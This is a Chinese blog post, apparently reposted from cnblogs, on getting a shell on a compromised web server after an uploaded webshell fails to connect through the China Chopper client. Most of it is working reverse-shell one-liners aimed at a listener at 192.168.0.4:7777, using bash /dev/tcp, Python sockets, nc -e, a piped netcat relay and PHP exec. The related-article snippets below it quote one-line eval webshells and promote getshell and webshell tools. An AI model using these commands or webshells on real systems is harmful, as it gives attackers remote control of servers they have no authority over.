菜刀失效以后得到web的方法

最新推荐文章于 2025-09-05 23:07:29 发布
最新推荐文章于 2025-09-05 23:07:29 发布
阅读量188 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 运维 数据库 shell
原文链接:http://www.cnblogs.com/yonghegn/p/10045054.html
本文介绍在菜刀连接失败的情况下,如何通过nc、python及PHP等工具反弹shell,获取远程控制权限,包括nc命令的使用、python反弹shell脚本及PHP反弹shell的方法。

在往常的测试过程中,有时费劲千辛万苦终于拿到了上传权限,美滋滋的上传了一句话,下一步的操作就是拿出菜刀连接,却发现菜刀失效了(没有被狗查杀和waf拦截,搞不懂为什么菜刀不能连接)。菜刀不行以后只能通过其它方式-通过nc反弹一个shell。

nc是netcat的简写,有着网络界瑞士军刀的美誉。通过执行nc的命令可以得到webshell。

首先,使用nc在kail上监听端口:

nc -lvp 7777

第二步:bash -i >& /dev/tcp/192.168.0.4/7777 0>&1

从上图可以看到,已经成功拿到了shell。

 

还可以通过python反弹:

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);

使用NC反弹shell:

nc -e /bin/bash 192.168.0.4 7777

nc -lvp 777

如果不支持-e参数的话,可以利用linux中的管道符:

服务端:nc  -nvlp 7777

              nc -nvlp 6666

客户端:

nc 192.168.0.4 6666|/bin/bash|192.168.0.4 7777

 

 

使用PHP方式反弹shell:

php- 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")'

 

转载于:https://www.cnblogs.com/yonghegn/p/10045054.html

WEB应用防护系统技术详解
weixin_44983560的博客
09-11 196
cookie:是指某些网站为了辨别用户身份,进行session跟踪,而存储在用户本地终端上的数据(通常经过加密)。cookie的一些典型应用:1、登录某些网站时还留存之前的登录信息,再一次进入网站时保留用户信息简化登录手续。2、另一个应用如购物车,用户在挑选多个商品后,添加到购物车,最后在付款时提取信息。cookie还分为会话性与持久性,会话性Cookie,仅保存在客户端内存中,并在用户关闭浏览器时失效
强劲的Web管理系统软件,中国菜刀(chopper)的使用说明和实例教程
xhlylxhl的博客
08-29 2500
在服务器端运作的编码给出: PHP: ASP: <%eval request(“pass”)%> ASP.NET: <%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%> JSP:<%if(request.getParameter(“f”)!=null)(ne...
PHP菜刀工具WebHandler
11-16 146
PHP菜刀工具WebHandler 在Web渗透测试中,后台代码如果包含系统命令执行功能,并以用户提交的数据作为参数,就带来潜在的安全隐患。Kali Linux提供一款PHP菜单工具WebHand...
PHP菜刀在线WEB版源码
SEO资源下载
04-25 1007
简介: 目前的功能有:文件管理,虚拟终端,文件查看,图片查看,一键挂黑。 源码为PHP文件直接上传即可使用! PC移动端布局自适应,用法自行探索,不需要的可以自行忽略。 网盘下载地址: http://kekewangLuo.cc/NpDKnYzCbYD0 图片: ...
web安全】分享三款Webshell管理工具(菜刀、蚁剑以及冰蝎)
2402_84205067的博客
11-01 2012
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
菜刀、蚁剑以及冰蝎三款Webshell管理工具简介
永远是少年
05-07 6916
今天继续给大家介绍渗透测试相关知识,本文主要内容是菜刀、蚁剑以及冰蝎三款Webshell管理工具简介。 一、三款webshell管理工具简单对比 二、菜刀数据包解析 三、蚁剑数据包解析 四、冰蝎数据包解析
2019-新闻原getshell.rar
09-26
这款工具本来不打算发布的,但是我打算退出这行了,所以把工具都发出来吧,希望站长可以好好扫描自己网站漏洞,这款工具主要针对新闻源网站的漏洞,因为新闻源普遍都有这个指纹
Web安全期末复习
kaisaooo的博客
07-02 6800
目录前言知识点Web应用开发基础Web信息收集Web漏洞扫描SQL注入文件上传攻击跨站脚本攻击(XSS)跨站请求伪造命令执行漏洞Web Server配置安全认证和授权日志系统构建及日志分析实战与综合简答题复习要点ASP.NET的安全控件web应用系统的数据加密数据库安全通信身份验证日志分析安全配置一套习题 前言 本文用来记录Web安全的复习资料,大部分内容都是从老师ppt的复习范围中节选的,可能不太全,经过考试的心得:有时间的可以多看看,考的比较杂啥都有,但是SQL注入、XSS、文件上传漏洞是重中之重。有
2021总结web渗透测试岗位面试题(个人亲身经历的总结)
小羊的博客
11-26 6529
目录 1·拿到一个待检测的站,你觉得应该先做什么? 2·xss 3·sql注入 4·真实ip 5.多地ping 6·应急响应 7·代码注入漏洞 8·sql注入如何读写文件,二次注入,防御方式 9·csrf和xss区别 10·文件上传的后段绕过,防御方式 11·中间件漏洞——IIS、Apache、nginx、Lighttpd、Tomcat 12·xxe与ssrf 13·rce讲一下,php函数eval和system popen 14·缓冲区溢出 15·数据库提权(mysql,ms
Web漏洞利用与安全加固
m0_52231503的博客
04-25 669
漏洞利用 实训准备 安装部署phpStudy+DVWA漏洞演练平台 一、 密码登录绕过 1、打开Brute Force界面,测试登陆框是否存在注入,提交敏感字符测试程序是否报错。在登录界面上输入用户名admin’(使用敏感字符‘)。 2、仔细观察登录系统时地址栏中的sql语句,在用户名密码提交界面上通过注入逻辑语句使登录判断失效,进入受保护页面。admin’ or 1=1 --’ 二、 命令注入 1、打开Command Injection界面,在该界面提供一个命令行执行环境,输入ip地址返回ping命令的结
信息安全实训笔记3——Web漏洞利用
m0_57570443的博客
04-29 2041
前言 DVWA(Damn Vulnerable Web Application)是randomstorm的一个开源项目。一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA共有十个模块,分别是: 1.Brute Force(密码破解) 2.Command Injection(命令行注入) 3.CSRF(跨站请求伪造) 4.File Inclusion(文件包含)
HM收割机一建getshell
02-22
懂得人自然懂 不懂得当然不懂 纯自动化 关键词 排名 拿shel l一键getshell
R019-shell-telnet.rar
04-15
V500 R19开telnet 补全SHWLL补丁.
远程后门木马扫描工具v2.0.exe
09-04
远程后门木马扫描工具v2.0.
任意文件读取与下载漏洞
热门推荐
qwzf
11-14 1万+
前言 上周参加了一个线上赛。有个Web题的WriteUp说是任意文件下载。由于之前没学过,所以就没有想到。现在学习一下 为什么产生任意文件读取与下载漏洞 一些网站的业务需要,可能提供文件查看或下载的功能,如果对用户查看或下载的文件不做限制,就能够查看或下载任意的文件,可以是源文件,敏感文件等等。 任意文件读取漏洞 任意文件读取是属于文件操作漏洞的一种,一般任意文件读取漏洞可以读取配置信息甚至系统重...
eclipse如何复制大量的get方法
chenxu6
05-03 737
使用场景:有时候我们需要将一个类转换为另一个类,这其中肯定会设计一些get,set操作,但当所要转换的类的成员变量很多,有大量的get,set方法时,用手工的方法去一个一个写set,get方法费时又费力,这时候就可以直接打开outline窗口,直接选中方法进行复制。
各语言漏洞检测工具
weixin_34192816的博客
09-10 201
2019独角兽企业重金招聘Python工程师标准>>> ...
齐博1.0全版本后台getshell漏洞复现
wanwan的博客
04-02 1974
思路整理并详细说明了一下01用户登陆判断的地方admin/global.php在用户不存在地方呢执行了一个eval():eval(base64_decode("Y$webdb[_Notice]"));该参数打印出来:copy("http://www.php168.com/Notice/?url=$webdb[www_url]",PHP168_PATH."cache/Notice.php");将一个...
【Linux游记】基础指令篇
最新发布
枫の大一分享
09-05 1099
摘要:本文介绍了Linux编程环境中的核心工具链,包括软件包管理(yum/apt)、Vim编辑器使用技巧、gcc/g++编译过程(预处理/编译/汇编/链接)、Makefile自动化构建、进度条程序实现及Git版本控制。重点讲解了yum软件包管理器的安装/卸载操作、vim三种模式切换方法、动态/静态链接区别,并提供了进度条示例代码和Makefile编写规范。文章采用轻松幽默的语言风格,旨在帮助初学者系统掌握Linux开发基础工具的使用方法。(149字)
Web 菜刀工具cknife的压缩包文件分析
标签 "web 菜刀" 暗示这个项目可能是为Web开发而设计的工具或框架。"web 菜刀" 是一个中文词汇,直译为 "Web knife"。在IT领域,"菜刀" 一词常被非正式地用来指代某个功能强大、操作简便的工具或软件,尤其是针对Web...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值